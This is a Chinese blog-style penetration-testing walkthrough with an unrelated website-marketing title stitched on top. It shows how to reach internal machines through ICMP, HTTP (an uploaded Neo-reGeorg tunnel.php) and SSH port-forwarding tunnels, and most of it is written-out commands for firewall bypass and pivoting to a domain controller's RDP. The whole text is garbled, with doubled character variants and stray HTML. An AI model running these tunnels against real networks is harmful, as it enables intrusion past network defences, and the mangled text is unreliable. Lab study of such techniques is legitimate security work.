學(xué)會(huì)建網(wǎng)站如何做網(wǎng)絡(luò)營(yíng)銷友情鏈接的作用大不大
昨天講了通過(guò)代理的形式(端口轉(zhuǎn)發(fā))實(shí)現(xiàn)了上線不出網(wǎng)的機(jī)器,那么今天就來(lái)講一下如何通過(guò)隧道上線不出網(wǎng)機(jī)器
? ??
目錄
1.網(wǎng)絡(luò)拓?fù)?/p>
2.開(kāi)始做隧道?No!!!
3.icmp隧道
4.HTTP隧道
5.SSH隧道
1.什么是ssh隧道
2.ssh隧道:端口轉(zhuǎn)發(fā)
3.SSH遠(yuǎn)程端口轉(zhuǎn)發(fā)
4.ssh動(dòng)態(tài)端口轉(zhuǎn)發(fā)
1.網(wǎng)絡(luò)拓?fù)?/h2>
今天我youyouyouyouyoyoyo又配環(huán)境配到崩潰了,是的,配環(huán)境已經(jīng)給我整麻了(kali的網(wǎng)卡那里感覺(jué)有點(diǎn)問(wèn)題,怎么配都配不好)所以我知難而退,改換橋接!!
?大概是這樣的一個(gè)網(wǎng)絡(luò)拓?fù)?/p>
2.開(kāi)始做隧道?No!!!
第一部肯定不是做隧道啊!,你連防火墻給你通過(guò)什么流量都不知道,做啥隧道,做了流量也過(guò)不去,所以!!正確的第一步,是通過(guò)對(duì)應(yīng)的流量探測(cè)去制定隧道的種類!!!
3.icmp隧道
所謂的icmp隧道就是:將數(shù)據(jù)包夾帶在icmp的數(shù)據(jù)包中,其中,ICMP 隧道幾乎在所有的網(wǎng)絡(luò)環(huán)境中都是被允許的,因此攻擊者可以通過(guò) ICMP 隧道繞過(guò)一些網(wǎng)絡(luò)安全設(shè)備。
但是!!!這個(gè)程序似乎在一些低版本的Windows上運(yùn)行不了(缺少一些系統(tǒng)動(dòng)態(tài)鏈接庫(kù)文件)
雖然win11可以(但是很多內(nèi)網(wǎng)的環(huán)境都是用的win7 winserver這種的)所以適用范圍較窄感覺(jué)
即便是這樣,那也還是要將草走復(fù)現(xiàn)一下的!😭😭😭
先是kali上的命令
sysctl -w net.ipv4.icmp_echo_ignore_all=1 //用于禁用本機(jī)對(duì)icmp流量的應(yīng)答
然后再win7靶機(jī)上運(yùn)行
pingtunnel.exe -type server -noprint 1 -nolog 1
然后kali上運(yùn)行以下命令,意思就是將本機(jī)的8888作為scok5的連接端接口
bash pingtunnel -type client -l:8888 192.168.3.58 -sock5 1
最后就在kali上修改一個(gè)配置文件
vim /etc/proxychain4.conf //并且在底部添加一行socks5 127.0.0.1 8888 即可
?就可以遠(yuǎn)程連接了
proxychains rdesktop 192.168.52.138
4.HTTP隧道
這個(gè)比較常見(jiàn),我們經(jīng)常都是通過(guò)一個(gè)web漏洞去getshell的,所以防火墻一般不會(huì)限制http流量
HTTP隧道有特別特別多,今天來(lái)分享一個(gè)加密隧道穿透 Neoreg-reGeorg
下載連接 :項(xiàng)目概覽 - Neo-reGeorg - GitCode
開(kāi)整,先再擺一下網(wǎng)絡(luò)拓?fù)?#xff0c;以免忘記
先在kali上運(yùn)行,k后面可以跟上你自己的密碼
python neoreg.py -k "你的密碼"
然后判斷網(wǎng)站的語(yǔ)言,我這個(gè)win7上搭建的是php的網(wǎng)站
我們?cè)趫?zhí)行完kali的命令之后會(huì)生成一個(gè)文件夾
?? ? ? --->? ? ? ?
選擇對(duì)應(yīng)的網(wǎng)站語(yǔ)言扔上去 (我這里扔的是tunnel.php)可以看見(jiàn)能成功訪問(wèn)
于是就在kali上執(zhí)行這個(gè)命令,意思就是開(kāi)本地的8888端口來(lái)連接遠(yuǎn)程的php文件
python neoreg.py -k "你的密碼" -u http://192.168.3.58/tunnel.php -p 8888
這就可以了???,肯定不是啊,你還沒(méi)開(kāi)socks5的本地代理端口,咳咳咳,差點(diǎn)忘記說(shuō)了
這個(gè)工具建立的是socks5代理,所以你就開(kāi)啟對(duì)應(yīng)的代理端口
vim /ect/proxychains4.conf
?在這個(gè)文件的最底端加上這個(gè)指令 socks5 127.0.0.1 8888
然后就可以連接啦!!!!? ? ?
proxychains rdesktop 192.168.52.138 //這個(gè)可以直接寫內(nèi)網(wǎng)的地址!!!
?這樣就能成功連接上去了!!!!嘿嘿嘿
?當(dāng)然了,http隧道可不止這一種,tunna abptts pivotnaacci 這些都是http的隧道,就不多枚舉了
5.SSH隧道
眾所周知,在實(shí)戰(zhàn)中一般服務(wù)器都是的Linux_like的,于是小編就去下載了一個(gè)Ubuntu來(lái)玩一下
是時(shí)候該更新網(wǎng)絡(luò)拓?fù)淅?/p>
? ?? 于是這樣我們就有了一臺(tái)新的Linux服務(wù)器,
可以搞事情了
直接訪問(wèn)它的網(wǎng)站根目錄下的文件hhhh~~~
??
1.什么是ssh隧道
在實(shí)際中,大部分的Linux服務(wù)器都支持ssh協(xié)議,內(nèi)網(wǎng)中的主機(jī)和設(shè)備以及邊界的防火墻都允許ssh流量通過(guò),但是!!!ssh除了可以遠(yuǎn)程連接,還可以轉(zhuǎn)發(fā)流量,并且是加密轉(zhuǎn)發(fā),進(jìn)而突破防火墻限制
2.ssh隧道:端口轉(zhuǎn)發(fā)
首先確定Ubuntu的22端口開(kāi)放,以及知道它的賬號(hào)密碼 ,就可以在kali進(jìn)行以下操作
ssh -L 8887 192.168.52.138:3389 whoami@192.168.3.61 -p 22
這個(gè)的意思就是
- kali先通過(guò)連接Ubuntu服務(wù)器
- 又因?yàn)閁buntu可以和內(nèi)網(wǎng)通信, -L 意思為將靶機(jī)的3389端口的流量準(zhǔn)發(fā)到攻擊機(jī)的8887端口
- 當(dāng)kali訪問(wèn)本地的8887就等于在訪問(wèn)內(nèi)網(wǎng)DC的3389端口
這樣就可以同時(shí)連接上兩臺(tái)服務(wù)器!!!
3.SSH遠(yuǎn)程端口轉(zhuǎn)發(fā)
這個(gè)和本地端口轉(zhuǎn)發(fā)有點(diǎn)類似不過(guò)要先獲取它的root權(quán)限,這個(gè)Linux不用于Linux
蟻劍是無(wú)法執(zhí)行ssh的,而且上線cs有點(diǎn)困難我不會(huì),于是就要在ubuntu上面敲這個(gè)代碼
ssh -R 8887:192.168.52.138:3389 kali@192.168.3.57 -p 22
前提是你的攻擊機(jī)器kali開(kāi)啟22端口!!可以這樣查看
sudo systemctl status ssh
沒(méi)開(kāi)啟的話開(kāi)啟就好
sudo systemctl start ssh
然后在你的Ubuntu上面輸入kali的密碼就能成功連接了
但是,在你連接上了內(nèi)網(wǎng)DC的時(shí)候,Ubuntu也是連接上了你的kali
如果你的虛擬機(jī)配置不當(dāng),或者說(shuō)別的大佬有0day,是可以造成虛擬機(jī)越獄的,那到時(shí)候你就慘了
4.ssh動(dòng)態(tài)端口轉(zhuǎn)發(fā)
所謂的動(dòng)態(tài)端口轉(zhuǎn)發(fā)就是建立起一個(gè)ssh加密的socks4/5的代理隧道,我們需要在kali運(yùn)行以下命令
ssh -D 8888 whoami@192.168.3.61
然后就能連接上Ubuntu了,其中的 -D意為建立socks5隧道流量走8888端口,去連接ubutu的22端口
當(dāng)然了,以上能成功,是在socks5代理成功配置的情況下噢
滿足上述條件,就能實(shí)現(xiàn)內(nèi)網(wǎng)穿透了,遠(yuǎn)程上線成功!!!!
以上,就是多種的協(xié)議對(duì)應(yīng)的一些隧道!!當(dāng)然還有很多,像DNS ,RDP ,IPV6都是有對(duì)應(yīng)隧道的,這里我就不枚舉了!!
?明天講什么呢?? 講隧道穿透利用方法, 多層代理,反正向代理,多級(jí)代理,節(jié)點(diǎn)加密,節(jié)點(diǎn)穿透,對(duì)應(yīng)工具部署!!!! Byd我都期待起來(lái)了!!?
????